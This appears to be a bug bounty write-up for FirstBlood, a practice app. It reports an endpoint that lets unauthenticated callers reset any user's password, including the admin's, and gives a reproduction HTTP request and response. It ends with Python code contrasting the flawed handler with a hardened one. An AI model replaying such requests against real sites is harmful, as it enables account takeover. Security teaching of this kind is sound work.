FirstBlood-#383: Edit password functionality can be used to reset password of any user
This issue was discovered on FirstBlood v2.0.0 (issues patched)

On 2021-10-25, sumyth Level 2 reported:


Please find a brief description of the vulnerability below,

There exists functionality which can be used to reset the password of any user/doctor present on the website without even being authenticated.

Steps to reproduce:

  1. Generate the following POST request with a username of your choice:
POST /drpanel/drapi/editpassword.php HTTP/1.1
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

  2. Send the request to the server. Observe that the server responds with a new password for the user without performing proper authorization checks:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Oct 2021 15:58:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34

Password updated - bL9TfVhgA5Oxs46


Having password-changing functionality without any kind of authorization can allow an attacker to reset the password of any user on the website, which leads to account compromise.


Endpoint: /drpanel/drapi/editpassword.php

This bug makes use of the following vulnerabilities in a chain:

  • Auth issues
  • Application/Business Logic

FirstBlood ID: 28
Vulnerability Type: Auth issues

The endpoint /drapi/editpassword can actually be accessed unauthenticated.

FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admin's password (dradmin) from /drapi/editpassword, as the endpoint only looks at the submitted username. Usernames can be enumerated when logging in, since trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
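The two root causes above (no authentication on the endpoint, and authorization decided solely by the submitted username) can be shown side by side with the checks that close them. The following is an added example written for this write-up, not FirstBlood's own editpassword.php code: it models the handler in Python with a constructed in-memory user store and a hypothetical session dict, and it also shows the uniform login error that removes the username-enumeration difference mentioned above.

```python
import secrets
import string
from dataclasses import dataclass
from typing import Optional, Tuple


# Constructed sample store; not FirstBlood's real data model.
@dataclass
class User:
    username: str
    password: str
    is_admin: bool = False


def make_users() -> dict:
    """Fresh copy of the constructed user store for each demonstration."""
    return {
        "dradmin": User("dradmin", "old-admin-pass", is_admin=True),
        "drsmith": User("drsmith", "old-smith-pass"),
    }


def _new_password(length: int = 15) -> str:
    """Random replacement password from a CSPRNG (secrets, not random)."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def edit_password_vulnerable(form: dict, users: dict) -> str:
    """Mirrors the behaviour the report describes: the handler consults only
    the submitted username and never checks who is calling."""
    user = users.get(form.get("username", ""))
    if user is None:
        return "No such user"
    user.password = _new_password()
    # Echoing the new secret in the response is the second problem here.
    return f"Password updated - {user.password}"


def edit_password_fixed(session: Optional[dict], form: dict, users: dict) -> Tuple[int, str]:
    """Hardened handler: authenticate the caller, then authorize the target."""
    # 1. Authentication: anonymous callers get no further than this line.
    if not session or "username" not in session:
        return 401, "Authentication required"
    caller = users.get(session["username"])
    if caller is None:
        return 401, "Authentication required"

    # 2. Authorization: the target must be the caller's own account, or the
    #    caller must hold the admin role. The form field alone decides nothing.
    target_name = form.get("username", "")
    if target_name != caller.username and not caller.is_admin:
        return 403, "Not permitted"
    target = users.get(target_name)
    if target is None:
        return 404, "No such user"

    target.password = _new_password()
    # 3. Do not return the new credential in the HTTP body; a real deployment
    #    would deliver it out-of-band or require the user to pick a new one.
    return 200, "Password updated"


def login(form: dict, users: dict) -> Tuple[int, str]:
    """Same error text whether the username exists or the password is wrong,
    so 'drAdmin' and 'dradmin' cannot be told apart by the response."""
    user = users.get(form.get("username", ""))
    supplied = form.get("password", "")
    if user is None or not secrets.compare_digest(user.password, supplied):
        return 401, "Invalid username or password"
    return 200, "Logged in"


if __name__ == "__main__":
    store = make_users()
    print("vulnerable, anonymous caller:", edit_password_vulnerable({"username": "dradmin"}, store))
    store = make_users()
    print("fixed, anonymous caller:     ", edit_password_fixed(None, {"username": "dradmin"}, store))
    print("fixed, drsmith -> dradmin:   ", edit_password_fixed({"username": "drsmith"}, {"username": "dradmin"}, store))
    print("fixed, drsmith -> drsmith:   ", edit_password_fixed({"username": "drsmith"}, {"username": "drsmith"}, store))
    print("login unknown user:          ", login({"username": "drAdmin", "password": "x"}, store))
    print("login known user, bad pass:  ", login({"username": "dradmin", "password": "x"}, store))
```

The ordering in `edit_password_fixed` is the point: the session is verified before the form is even read, and the username from the form is only ever compared against the authenticated identity, never trusted on its own. The same structure applies to any state-changing endpoint under /drapi/.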